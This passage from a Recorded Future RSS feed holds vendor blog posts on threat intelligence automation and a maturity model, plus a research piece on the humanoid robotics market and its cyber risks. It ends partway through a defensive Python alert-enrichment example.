        <p><a href="https://www.recordedfuture.com/industry/financial">Banks and financial institutions</a> face constant phishing, fraud, and account takeover attempts. Threat intelligence automation helps instantly flag things like fraudulent banking websites impersonating the institution, or dumps of customer credentials on the dark web. If a fake banking login page is spun up to phish customers, an automated system can detect that site and raise an alert before any customers fall victim. Similarly, automation assists in fraud detection by correlating internal transaction anomalies with known threat patterns in real time. If a series of suspicious money transfers aligns with a known fraud tactic described in threat intel reports, the system can bring it to analysts’ attention immediately.</p>
        <h3>Government</h3>
        <p><a href="https://www.recordedfuture.com/industry/public-sector">Government agencies</a> and defense organizations are high-value targets for state-sponsored cyber attacks. Threat intelligence automation gives these SOCs an upper hand by continuously scanning for indicators of nation-state campaigns targeting them. For instance, an automated platform might monitor for malware signatures, spear-phishing themes, or infrastructure known to be used by groups hostile to a particular country. The moment something matching those patterns is found, the system immediately alerts the security team. This real-time awareness is critical for government SOCs to mobilize defenses against advanced threats.</p>
        <h3>Healthcare</h3>
        <p><a href="https://www.recordedfuture.com/industry/healthcare">Hospitals and healthcare providers</a> are frequently targeted by ransomware, data theft, and other cyberattacks that can literally put lives at risk. Automated threat intelligence in healthcare monitors for signs of impending attacks and provides early warnings. If an underground forum post indicates interest in exploiting a particular healthcare software, the security team can be alerted to fortify that system preemptively. This sector also benefits from automation in disrupting criminal activities: for example, automated systems can detect illicit online marketplaces selling stolen patient data or fake pharmaceutical websites that could harm public trust.</p>
        <h2>Future of Threat Intelligence Automation</h2>
        <p>As cyber threats evolve, automated defense systems will evolve alongside them, becoming self-learning. In the near future, these systems could autonomously adjust detection thresholds or even launch countermeasures based on learned experience, further reducing the need for human tuning. Recorded Future is at the forefront of this trend, embedding advanced AI into its Intelligence Cloud for capabilities like predictive risk scoring, anomaly detection at scale, and automated decision support. The vision is that intelligence automation becomes an indispensable co-pilot for every security team, helping humans make better decisions faster.</p>
        <p>However, it’s important to note that attackers are also embracing AI to automate and enhance their attacks. In response, <a href="https://www.recordedfuture.com/blog/state-of-ai-and-automation-in-threat-intelligence">defensive AI systems</a> are being developed to spot AI-generated threats and respond at machine speed. In this escalating battle, organizations that invest early in threat intelligence automation and AI will possess the agile, self-updating defenses needed to counter AI-augmented cyber attacks.</p>
        <h2>Start Protecting Your Business With Threat Intelligence Automation Today</h2>
        <p>Cyber attacks are accelerating and evolving on a daily basis. This reality makes traditional, purely manual security operations untenable. The longer it takes to detect and respond to threats, the greater the potential damage. By automating intelligence collection and response, organizations drastically improve their chances of stopping breaches in time.</p>
        <p>Recorded Future’s Intelligence Cloud offers an unparalleled combination of real-time breadth, analytical depth, and seamless actionability.</p>
        <p><strong>Ready to accelerate your security operations with threat intelligence automation?</strong> Reach out for a <a href="https://www.recordedfuture.com/get-started">demo or trial</a> to experience how real-time threat intelligence automation can make all the difference in protecting your business.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_10fad5051847a2e2fec903fc5387af7690cc597ae.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Future of Humanoid Robotics]]></title>
            <link>https://www.recordedfuture.com/research/future-humanoid-robotics</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/future-humanoid-robotics</guid>
            <pubDate>Thu, 20 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Humanoid robots are arriving faster than anyone expected. Discover the hidden risks, global power shifts, and breakthroughs shaping the future — before your competitors do.]]></description>
            <content:encoded><![CDATA[
        <h2>Summary</h2>
        <p>Advances in <strong>large-language models (LLMs) and the anticipated arrival of artificial general intelligence (AGI) are rapidly closing the gap between concept and capability</strong>. The prospect of humanoid robots functioning autonomously in workplaces and public spaces is moving from speculative to attainable.</p>
        <p>Global <strong>population decline is accelerating the demand for humanoid robots</strong> designed to operate within human environments and offset growing labor shortages across industries.</p>
        <p>A growing number of companies are developing humanoid robots for roles in manufacturing, customer service, and even athletic competition. Investors are positioning for long-term growth, with research suggesting that by <strong>2060, more than three billion humanoid robots could be integrated into human society.</strong></p>
        <p><strong>China appears poised to lead the field of humanoid robotics</strong>. Facing a steep population decline, its strategic emphasis on automation and robotics is becoming central to sustaining economic output and competitiveness.</p>
        <p>Humanoid robots will almost certainly be <strong>vulnerable to cyberattacks</strong>, ranging from hijacking and data leaks to the formation of botnets. This highlights the urgent need to treat humanoid robots with the same rigorous cybersecurity standards as any connected system.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_11343f5637b04703c291220dba0dc5cbf41224450.png?width=750&amp;format=png&amp;optimize=medium" width="1178" height="682" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Summary of the conditions that could create a huge demand for humanoid robots in the coming years (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Analysis</h2>
        <p><a href="https://www.nvidia.com/en-gb/glossary/humanoid-robot/">Humanoid robots</a> are general-purpose, bipedal robots modeled after the human form and designed to work alongside humans. They are currently being designed to work in factories, serve us, and look after us.</p>
        <p>Understanding the increased <a href="https://www.telegraph.co.uk/business/2025/10/25/robots-save-britains-economy-ageing-population/">attention</a> being given to humanoid robotics begins with recognizing a primary driver: a global labor shortage caused by population decline. Modern economies rely on sustained consumption and productivity growth, both of which are underpinned by expanding populations. Yet, across much of the developed world, and increasingly in emerging markets, this two-century trend of population growth is <a href="https://www.ft.com/content/2d37dc16-5c73-4f2a-92a5-a78326f9dc3d">reversing</a>. The global workforce is shrinking, and the implications for economic output are profound. As traditional labor pools <a href="https://www.mckinsey.com/mgi/our-research/dependency-and-depopulation-confronting-the-consequences-of-a-new-demographic-reality">contract</a>, humanoid robots represent a potential solution, a means of sustaining productivity and economic stability in the face of structural demographic change.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1dc2c1e3a9c483de4b7b76bf2bdbb4d564b9bd697.png?width=750&amp;format=png&amp;optimize=medium" width="1244" height="1412" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Forecasts indicate a global population decline, with developed economies projected to experience the most significant impact first (Source:</em> <em><a href="https://www.economist.com/interactive/briefing/2025/09/11/humanity-will-shrink-far-sooner-than-you-think">The Economist</a>)</em></div>
          </div>
        </div>
        <p>Robots working in this capacity are not a new concept. For decades, specialized <a href="https://www.autodesk.com/design-make/articles/history-of-industrial-robots">industrial robots</a> have revolutionized manufacturing by enhancing productivity and mitigating labor shortages, particularly in aging societies such as Japan and South Korea. However, as global demographics shift and labor shortages accelerate, repetitive automation alone will not sustain economic growth. The next phase of robotics will require systems capable of operating seamlessly in environments designed for humans, robots with human-like forms, and, increasingly, human-like cognition.</p>
        <p>Advances in LLMs have accelerated progress toward AGI, making human-like cognition in robots a plausible near-term <a href="https://www.digitimes.com/reports/ai/2025_robots/assets/humanoid-robotics-2025.pdf">reality</a>. Combined with breakthroughs in robotics engineering and declining production costs, these developments position humanoid robots to extend far beyond industrial applications. They are <a href="https://www.bloomberg.com/opinion/articles/2025-09-29/the-us-needs-to-control-its-own-humanoid-robot-future">poised</a> to enter service sectors, healthcare, defense, and domestic care, therefore addressing critical workforce shortages <a href="https://www.bbc.co.uk/news/articles/c9wdzyyglq5o">driven</a> by aging populations.</p>
        <p>The commercial potential of the humanoid robot market is <a href="https://www.morganstanley.com/insights/articles/humanoid-robot-market-5-trillion-by-2050">significant</a>. Recognizing this, both startups and established corporations are making substantial <a href="https://globalventuring.com/corporate/industrial/corporate-investors-humanoid-robots/">investments</a> in humanoid robotics. Leading artificial intelligence (AI) companies are <a href="https://www.iotworldtoday.com/robotics/microsoft-open-ai-to-invest-500m-in-humanoid-robot-startup">investing</a> in humanoid robotics to develop platforms that integrate their cognitive technologies into mobile, human-like forms. At the same time, automotive manufacturers with decades of experience in using robotics and specializing in mass production are <a href="https://www.iotworldtoday.com/robotics/hyundai-to-buy-thousands-of-boston-dynamics-robots-to-advance-manufacturing">investing</a> in the humanoid robotics market and adapting their capabilities to <a href="https://www.independent.co.uk/tech/elon-musk-tesla-optimus-robots-b2819277.html">mass-produce</a> humanoid robots, viewing it as a natural evolution. Today, humanoid robots are deployed in industrial environments and showcased in global sporting events such as the inaugural 2025 <a href="https://www.cnn.com/2025/08/16/sport/world-humanoid-robot-olympics-china-intl">Robot Olympics</a> in Beijing.<br />While the production and manufacturing of humanoid robots is complicated and expensive, with each passing year, the cost of producing them is <a href="https://www.mitsui.com/mgssi/en/report/detail/__icsFiles/afieldfile/2025/03/27/2501btf_tsuji_matsuura_e.pdf">decreasing</a>. 
Globally, analysts <a href="https://www.outlookbusiness.com/start-up/deeptech/humanoid-robots-could-cost-just-13000-by-2035-heres-what-that-means-for-global-ai-race?utm_source=chatgpt.com">expect</a> the average bill-of-materials (BOM) cost per humanoid robot to decrease to USD 13,000–17,000 by the early 2030s, thereby reducing the average purchasing cost per robot.</p>
        <p>China, in particular, is <a href="https://www.goldmansachs.com/static-libs/pdf-redirect/prod/index.html?path=/pdfs/insights/pages/gs-research/global-automation-humanoid-robot-the-ai-accelerant/report.pdf&amp;originalQuery=&amp;referrer=https://www.google.com/">leading</a> the way. Some of its humanoid robots, such as Unitree’s R1 robot, can already be <a href="https://www.reuters.com/technology/chinas-unitree-prices-new-humanoid-robot-deep-discount-2024-model-2025-07-25/?utm_source=chatgpt.com">purchased</a> for around USD 5,500.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1fa96336ae238d88e9f0a43c90b0ed801560f932c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="817" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Projected cost reductions associated with large-scale production increases (Source:</em> <em><a href="https://institute.bankofamerica.com/content/dam/transformation/humanoid-robots.pdf">Bank of America Institute “Humanoid Robots 101”</a>)</em></div>
          </div>
        </div>
        <p>Furthermore, unlike other countries that have attempted to offset labor shortages through immigration, China’s policy has been more focused on finding a <a href="https://www.ispionline.it/en/publication/why-isnt-china-considering-immigration-against-demographic-decline-163101">technological solution</a> rather than importing labor. China’s long-term planning and economic strategy appear to be increasingly <a href="https://foreignpolicy.com/2025/10/14/china-peoples-daily-editorials-zhong-caiwen/?tpcc=editors_picks&amp;utm_source=Sailthru&amp;utm_medium=email&amp;utm_campaign=Editors%20Picks%20-%2010142025&amp;utm_term=editors_picks">focused</a> on robotics, and it has spent the last decade <a href="https://www.telegraph.co.uk/business/2025/10/12/why-western-executives-visit-china-coming-back-terrified/">preparing</a> its industrial base to mass-produce robots. It comes as no surprise that Recorded Future’s <a href="https://assets.recordedfuture.com/Datasheets/Datasheet-Network-Intelligence.pdf">Network Intelligence</a> continues to reveal state-linked malware families targeting the robotics industry, likely seeking to acquire sensitive intellectual property.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_15fbe77c33881ea8863b8ee9cc2eda36a8fb7ed71.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="766" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Malware families targeting robotics industries (Source:</em> <em><a href="https://app.recordedfuture.com/live/?sc=aLhYPi9JcFSo&amp;_sc_tail=o">Recorded Future</a>)</em></div>
          </div>
        </div>
        <p>Some speculative <a href="https://www.morganstanley.com/insights/articles/humanoid-robot-market-5-trillion-by-2050">forecasts</a> suggest that China could eventually field approximately 300,000,000 humanoid robots to compensate for its demographic decline, as its population is predicted to shrink significantly over the coming decades. Having dominated the production of electric vehicles, China and its leadership are now <a href="https://www.economist.com/china/2025/10/09/xi-jinping-is-personally-involved-in-chinas-new-five-year-plan">aiming</a> to dominate the humanoid robotics sector as well. These robots might also be exported to other countries facing demographic stress, potentially generating massive revenue for China.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13b5e3f99a420a71529b995e81087ffa8e0e92fdc.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="508" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 5:</strong></em> <em>China leading with patent filings mentioning humanoid robots 2020-25 (left) (Source:</em> <em><a href="https://advisor.morganstanley.com/john.howard/documents/field/j/jo/john-howard/The_Humanoid_100_-_Mapping_the_Humanoid_Robot_Value_Chain.pdf">Morgan Stanley, “The Humanoid 100”</a>); graph showing the organisations that are filing for humanoid technological development (right) (Source:</em> <em><a href="https://www.mitsui.com/mgssi/en/report/detail/__icsFiles/afieldfile/2025/03/27/2501btf_tsuji_matsuura_e.pdf">MITSUI &amp; CO. “Humanoid Robots”</a>)</em></div>
          </div>
        </div>
        <p>By comparison, there are <a href="https://www.lemonde.fr/en/economy/article/2025/08/16/china-s-robotics-industry-surges-amid-promise-of-a-5-trillion-market_6744434_19.html?utm_source=chatgpt.com">predictions</a> that the US might reach approximately 77,000,000 humanoid robots within a similar timeframe, coinciding with projected population decline in the US. However, these numbers remain highly speculative and should be treated as illustrative rather than definitive forecasts.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_123fa87fa5943d7999e144e538c07ed5f658f522b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1214" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 6:</strong></em> <em>Selected</em> <em><a href="https://www.voronoiapp.com/technology/The-Current-Generation-of-Humanoid-Robots-2025-4656">examples</a></em> <em>of notable humanoid robots currently under development; the list of humanoid robots represented in this image is not exhaustive (Source: Voronoi)</em></div>
          </div>
        </div>
        <p>The world appears to be moving steadily toward the age of humanoid robots. By 2060, <a href="https://institute.bankofamerica.com/content/dam/transformation/humanoid-robots.pdf">studies</a> project that up to three billion of these machines could coexist with humans, most of them serving in household and personal-assistant capacities. While this might seem speculative, the recent rapid progress made in artificial intelligence and electric vehicles suggests that it is a serious possibility.</p>
        <p>The path forward, however, is not without obstacles. The <a href="https://research.mobiusriskgroup.com/p/the-energy-diet-of-humanoid-robots">energy demands</a> of humanoid robots could pose a significant question, and producing millions of units would require <a href="https://www.marketindex.com.au/news/rise-of-the-machines-how-1-billion-humanoid-robots-by-2050-will-drive-a">mining</a> massive quantities of critical materials. Consequently, there is <a href="https://techcrunch.com/2025/09/26/famed-roboticist-says-humanoid-robot-bubble-is-doomed-to-burst/">skepticism</a> that the humanoid robot market will expand as rapidly as forecasts suggest. Some view current enthusiasm as part of the emerging technology hype cycle, <a href="https://rodneybrooks.com/why-todays-humanoids-wont-learn-dexterity/">warning</a> that a correction, or “hype crash,” is likely.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1850ff9130fc009c9405257e53560df078d6b7510.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 7:</strong></em> <em>Projected global ownership of humanoid robots, potentially reaching billions by 2060 (Source:</em> <em><a href="https://institute.bankofamerica.com/content/dam/transformation/humanoid-robots.pdf">Bank of America Institute “Humanoid Robots 101”</a>)</em></div>
          </div>
        </div>
        <p>We should also take the cybersecurity risks posed to humanoid robots seriously. For example, researchers recently <a href="https://github.com/Bin4ry/UniPwn">discovered</a> a critical flaw in Unitree Robotics’ Bluetooth protocol that could let attackers wirelessly hijack its humanoid robots — machines already in use across labs, universities, and law enforcement agencies. In another instance, researchers found leaked, hard-coded encryption keys that allow one compromised robot to infect others nearby, forming botnets with root-level control. One model also <a href="https://techxplore.com/news/2025-09-g1-humanoid-robots-secretly-china.html">transmitted</a> data to servers in China without user consent. This followed a viral <a href="https://www.vice.com/en/article/humanoid-robot-turned-on-handlers-at-factory-in-dystopian-attack/">incident</a> in May 2025, in which a humanoid robot turned on its human handlers.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_17f43a7e43b8a3935ffc54de121657ac7cc8c41a5.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1154" height="508" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 8:</strong></em> <em>Statement from Unitree Robotics regarding the security vulnerabilities in their robots in October 2025 (Source:</em> <em><a href="https://www.linkedin.com/posts/unitreerobotics_statement-to-our-respected-unitree-users-activity-7378441101927436288-lLdA?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAABJFSTMBitTVESuT6vGntc-sNUQj9qBY9Q4">Unitree Robotics LinkedIn Post</a>)</em></div>
          </div>
        </div>
        <p>These security flaws, whether due to negligence or intent, create opportunities for serious cyber threats. Humanoid robots are often <a href="https://interestingengineering.com/innovation/security-flaw-unitree-humanoids-china">network-connected</a> systems that must meet the same security standards as any other digital asset.</p>
        <h2>Outlook</h2>
        <p><strong>China is likely to lead in the development and export of humanoid robots.</strong> It has already invested heavily in research and development and faces mounting pressure to deploy robots to mitigate severe labor shortages. Thus, China is likely to produce more cost-effective options than other countries, such as the United States, which will likely produce more advanced but more expensive models. Much like China’s lower-priced electric vehicles that are now dominating global markets, its humanoid robots may follow a similar trajectory, expanding rapidly into developing economies.<br /><br /><strong>Car manufacturers will likely increasingly enter the humanoid robot industry.</strong> This shift is partly an effort to offset declining car sales driven by population decline, but primarily because these companies already deploy robots at scale and possess the expertise to mass-produce complex machinery on assembly lines.</p>
        <p><strong>Cyber-espionage activity targeting companies in the robotics sector will almost certainly accelerate.</strong> State-sponsored cyber threat actors are already actively targeting the electronics and advanced manufacturing industries to obtain intellectual property that enhances domestic production. As the robotics industry becomes increasingly prevalent, the risk of cyberattacks against companies and their supply chains is expected to grow.</p>
        <p><strong>A new industry designed to secure humanoid robots is likely to emerge in the next decade.</strong> Securing humanoid robots will become an essential function, leading to the rise of dedicated security sectors, much like those that developed to protect computers in the past.</p>
        <p><strong>Geopolitical tensions are likely to intensify as nations compete to secure the resources necessary for the development of humanoid robots.</strong> Demand for rare earth elements, semiconductors, and other key components will heighten competition for mines and production facilities. Organizations involved in this supply chain will also need robust cybersecurity measures to protect against espionage and destructive cyberattacks targeting robotic systems.</p>
        <h2>Mitigations</h2>
        <p><strong>Track global humanoid robotics developments.</strong> Monitor government and corporate investments, export strategies, and regulations shaping the humanoid robotics industry. Use Recorded Future’s <a href="https://www.recordedfuture.com/products/geopolitical-intelligence">Geopolitical Intelligence</a> module to monitor policy shifts and strategic industrial activity.<br /><br /><strong>Prepare for advanced robotics integration.</strong> Assess how humanoid and adaptive robotics fit within manufacturing, logistics, and defense operations, including their impacts on the workforce and safety. Use Recorded Future’s <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a> to identify risks as robotics integrates into operations.</p>
        <p><strong>Strengthen robotics and Internet-of-Things (IoT) security.</strong> Expand IoT security to cover robotic hardware, firmware, and AI systems. Segment networks and continuously monitor for anomalies. Use Recorded Future’s <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> for alerts on exploits and threat actor activity targeting robotics.</p>
        <p><strong>Monitor criminal and dark web activity.</strong> Track chatter and listings on criminal forums related to robotics or IoT exploitation to identify early threats or potential attack planning. Use Recorded Future’s <a href="https://www.recordedfuture.com/products/threat-intelligence">Threat Intelligence</a> module to monitor dark web and closed-source chatter tied to robotics targeting.</p>
        <p><strong>Anticipate geopolitical supply chain risks.</strong> Watch for disruptions or state competition over rare earths, semiconductors, and energy that could impact robotics production. Use Recorded Future’s <a href="https://www.recordedfuture.com/products/geopolitical-intelligence">Geopolitical Intelligence</a> module to gain visibility into geopolitical risks.</p>
        <h2>Risk Scenario</h2>
        <p><strong>Scenario:</strong> Your company supplies critical components to a firm developing advanced humanoid robots. Meanwhile, a nation pursuing similar ambitions in robotics seeks to acquire your intellectual property to accelerate its own program.</p>
        <h3>First-Order Implications</h3>
        <h4>Threat</h4>
        <p>State-backed hackers compromise engineering systems through supplier access points and credential theft. An insider also provides unauthorized access to proprietary robotics designs and control algorithms.</p>
        <h4>Organizational Risk</h4>
        <ul>
          <li><strong>Operational:</strong> Disruption to research and development (R&amp;D) and production as systems are secured and code repositories quarantined</li>
          <li><strong>Legal:</strong> Possible breach of export-control and defense technology regulations</li>
          <li><strong>Brand:</strong> Damage to reputation as a trusted supplier of advanced technology</li>
          <li><strong>Competitive:</strong> Early exposure of design concepts erodes secrecy around next-generation capabilities</li>
        </ul>
        <h3>Second-Order Implications</h3>
        <h4>Threats</h4>
        <p>Stolen designs enable the foreign nation to fast-track its robotics program, eroding your client’s competitive advantage. Compromised components create a backdoor risk for your client’s production environment.</p>
        <h4>Organizational Risk</h4>
        <ul>
          <li><strong>Operational:</strong> Heightened security reviews delay contracts and certifications</li>
          <li><strong>Financial:</strong> Loss of key clients and potential cancellation of high-value agreements</li>
          <li><strong>Legal:</strong> Cross-border investigations into data handling and export compliance</li>
          <li><strong>Competitive:</strong> Diminished differentiation as adversaries replicate your technology and erode market leadership</li>
        </ul>
        <h3>Third-Order Implications</h3>
        <h4>Threats</h4>
        <p>The foreign nation deploys robotics derived from stolen intellectual property in global markets and military applications. Governments tighten export rules and exclude compromised firms from critical programs.</p>
        <h4>Organizational Risk</h4>
        <ul>
          <li><strong>Operational:</strong> A major redesign of the security architecture and requalification within trusted networks stalls operations</li>
          <li><strong>Financial:</strong> Long-term decline in market access and investor confidence</li>
          <li><strong>Legal:</strong> Ongoing regulatory oversight and potential sanctions due to past compromise</li>
          <li><strong>Brand:</strong> Lasting perception as a high-risk or compromised supplier</li>
          <li><strong>Competitive:</strong> Permanent loss of innovation lead and diminished influence over future robotics standards</li>
        </ul>
        <h2>Further Reading</h2>
        <ul>
          <li><a href="https://advisor.morganstanley.com/john.howard/documents/field/j/jo/john-howard/The_Humanoid_100_-_Mapping_the_Humanoid_Robot_Value_Chain.pdf">The Humanoid 100: Mapping the Humanoid Robot Value Chain</a></li>
          <li><a href="https://institute.bankofamerica.com/content/dam/transformation/humanoid-robots.pdf">Humanoid Robots 101</a></li>
          <li><a href="https://www.recordedfuture.com/research/rednovember-targets-government-defense-and-technology-organizations">RedNovember Targets Government, Defense, and Technology Organizations</a></li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1b8fde5342bd90e746bffe0ee7e55379fbbff17ca.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Operational Cyber Threat Intelligence]]></title>
            <link>https://www.recordedfuture.com/blog/operational-cyber-threat-intelligence</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/operational-cyber-threat-intelligence</guid>
            <pubDate>Wed, 19 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Move beyond noise. Learn how to build effective threat intelligence operations that turn raw data into actionable insights and proactive cyber defense.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>The average organization today relies on multiple platforms and tools delivering round-the-clock feeds of security information and alerts. Under this deluge of data, many organizations struggle to make sense of, let alone make use of, all this information.</li>
          <li>Recorded Future offers a concrete threat intelligence maturity journey that organizations can follow to evolve from this reactive state of intelligence overload to a more value-added state. The four stages of this journey are Reactive, Proactive, Predictive, and Autonomous.</li>
          <li>Along this journey, organizations take clear steps to go from responding to threats after detection, to preventing known threats, all the way to using automation to self-direct threat responses with minimal human intervention.</li>
          <li>Platforms like Recorded Future provide the data, context, and automation to accelerate your journey toward operational cyber threat intelligence maturity.</li>
        </ul>
        <h2>The Information Overload Problem: Why More Isn’t Always Better</h2>
        <p>Your security operations center (SOC) runs multiple <a href="https://www.recordedfuture.com/threat-intelligence">threat intelligence</a> feeds around the clock. Hundreds of alerts pour in daily—indicators of compromise (IOCs), suspicious IP addresses, emerging vulnerabilities, and more. Yet despite all this data, the team still spends much of its day reacting to alerts, rather than staying ahead of threats. Valuable data is stored, analyzed, and even given high visibility, but rarely acted upon in time to make a difference.</p>
        <p>This is the information overload problem, and it’s widening the gap between information and action. Organizations collect and subscribe to vast quantities of threat data from multiple sources, but few have the threat intelligence capabilities—the processes, integrations, and automation—required to add context to all that data and transform it into measurable security outcomes.</p>
        <p>The problem isn’t the data itself. It’s the operationalization of it: the ability to use threat data efficiently, contextually, and predictively across the security ecosystem. As Recorded Future highlights in its <em><a href="https://www.recordedfuture.com/resources/maturity-assessment#:~:text=Our%20free%20interactive%20assessment%20evaluates%20your%20capabilities%2C%20reveals,biggest%20ROI%20opportunities%2C%20quick%20wins%2C%20and%20tailored%20recommendations.">Threat Intelligence Maturity Assessment</a></em>, most organizations are somewhere along a journey toward maturity, moving from purely reactive intelligence to fully autonomous operations.</p>
        <p>This post explores that path, offering a practical roadmap for transforming raw alerts into <a href="https://www.recordedfuture.com/blog/operational-threat-intelligence">operational cyber threat intelligence</a>. Using the four stages of maturity (i.e., Reactive, Proactive, Predictive, and Autonomous), we’ll show how organizations can evolve their security programs from putting out fires to acting with foresight.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1f6ac9cee9a486fb9ce3a44eb5022a60f1b6814ba.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="600" />
            </div>
          </div>
          <div>
            <div><em>Stages of Recorded Future’s Threat Intelligence Maturity Model</em></div>
          </div>
        </div>
        <h2>The Threat Intelligence Maturity Model: From Reactive to Autonomous</h2>
        <p>Threat intelligence isn’t a binary capability. It exists on a continuum. As organizations gain visibility, automation, and analytical depth, their approach to threat intelligence evolves. Recorded Future’s <em><a href="https://www.recordedfuture.com/resources/maturity-assessment">Threat Intelligence Maturity Model</a></em> defines this journey in four stages:</p>
        <ol>
          <li><strong>Reactive</strong>: Responding to threats after detection.</li>
          <li><strong>Proactive</strong>: Preventing known threats before impact.</li>
          <li><strong>Predictive</strong>: Anticipating threats before they materialize.</li>
          <li><strong>Autonomous</strong>: Enabling self-directing, intelligence-led defense at machine speed.</li>
        </ol>
        <p>Each stage represents a significant leap in capability, mindset, and operational efficiency. Progress along this path requires more than just technology. It depends equally on people, processes, and the integration of intelligence into everyday decision-making.</p>
        <p>In the sections that follow, we’ll explore what defines each stage, common challenges, measurable KPIs, and key actions to help organizations advance their threat intelligence operations.</p>
        <h3>Stage 1: Reactive—Responding to What’s Already Happened</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c193da9e8d214f4a7e3c8f9d9eeb9360d05300c3.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="400" />
        </p>
        <p>In the Reactive stage, organizations are still fighting fires. <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Various forms of intelligence</a> are consumed, but rarely operationalized. Analysts <a href="https://www.recordedfuture.com/blog/why-manual-cyber-operations-can-create-dangerous-gaps">manually investigate alerts</a>, cross reference indicators, and often rely on intuition or Google searches to make sense of raw data.</p>
        <p>This stage is typical for teams suffering from alert fatigue or lacking dedicated threat intelligence personnel. Intelligence feeds may be connected to security tools, but without clear processes, much of that data sits unutilized.</p>
        <p><strong>Characteristics of a Reactive Organization</strong></p>
        <ul>
          <li>Focused on detection and containment.</li>
          <li>Success means closing incidents, not necessarily preventing them.</li>
          <li>However, this stage is where the foundation for maturity is built.</li>
        </ul>
        <p><strong>Pain Points and Challenges</strong></p>
        <ul>
          <li>Overload without insight: Teams receive too many alerts to analyze effectively.</li>
          <li>Siloed tools and workflows: Intelligence isn’t integrated across the stack.</li>
          <li>Limited automation: Manual lookups and enrichment dominate response time.</li>
          <li>High dwell time: Threats are detected after the fact, often too late for meaningful containment.</li>
        </ul>
        <p><strong>Steps to Advance</strong></p>
        <ul>
          <li>Centralize intelligence feeds into a single operational view.</li>
          <li>Automate enrichment of alerts with high-confidence threat indicators.</li>
          <li>Establish workflows for classifying, triaging, and escalating alerts based on context.</li>
          <li>Begin correlating IOCs with known campaigns or adversary tactics.</li>
        </ul>
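        <p>The four steps above, carried through in one place as an added example (this is not code from Recorded Future or from this post): a small Python enrichment pass that consolidates records from several feeds into one view, looks up the public IPs and hostnames in each alert, tags matches with confidence and campaign, collapses repeat alerts, and routes high-confidence hits straight to escalation. The feed records, the alert lines and their key=value format, and the 75-point escalation threshold are all constructed for illustration.</p>

```python
"""Centralize indicator feeds and auto-enrich alerts before an analyst sees them.

Added example, not code from Recorded Future or this post. The feed records,
the alert lines and the thresholds below are constructed for illustration.
"""
import ipaddress
import re

# Constructed records from three hypothetical feeds. Confidence is 0-100.
FEED_RECORDS = [
    {"value": "198.51.100.23", "confidence": 95, "campaign": "ExampleLocker C2", "source": "feed-a"},
    {"value": "198.51.100.23", "confidence": 70, "campaign": "ExampleLocker C2", "source": "feed-b"},
    {"value": "update-portal.example.net", "confidence": 85, "campaign": "Credential phishing kit", "source": "feed-b"},
    {"value": "203.0.113.7", "confidence": 25, "campaign": None, "source": "feed-c"},
]

# Constructed alert lines in a key=value format (not a real product's output).
ALERTS = [
    "2026-03-09T08:01:11Z alert=outbound_conn host=ws-014 src=10.0.0.5 dst=198.51.100.23",
    "2026-03-09T08:01:15Z alert=outbound_conn host=ws-014 src=10.0.0.5 dst=198.51.100.23",
    "2026-03-09T08:02:40Z alert=dns_query host=ws-021 src=10.0.0.9 qname=update-portal.example.net",
    "2026-03-09T08:03:02Z alert=inbound_scan host=edge-fw src=203.0.113.7 dst=192.0.2.10",
    "2026-03-09T08:04:30Z alert=outbound_conn host=srv-db1 src=10.0.1.4 dst=10.0.2.9",
]

ESCALATE_AT = 75  # confidence at or above which a match goes straight to IR
KV_RE = re.compile(r"(\w+)=(\S+)")
# RFC 1918 checked explicitly: Python's is_private also flags the documentation
# ranges (198.51.100.0/24, 203.0.113.0/24) used for the sample data above.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
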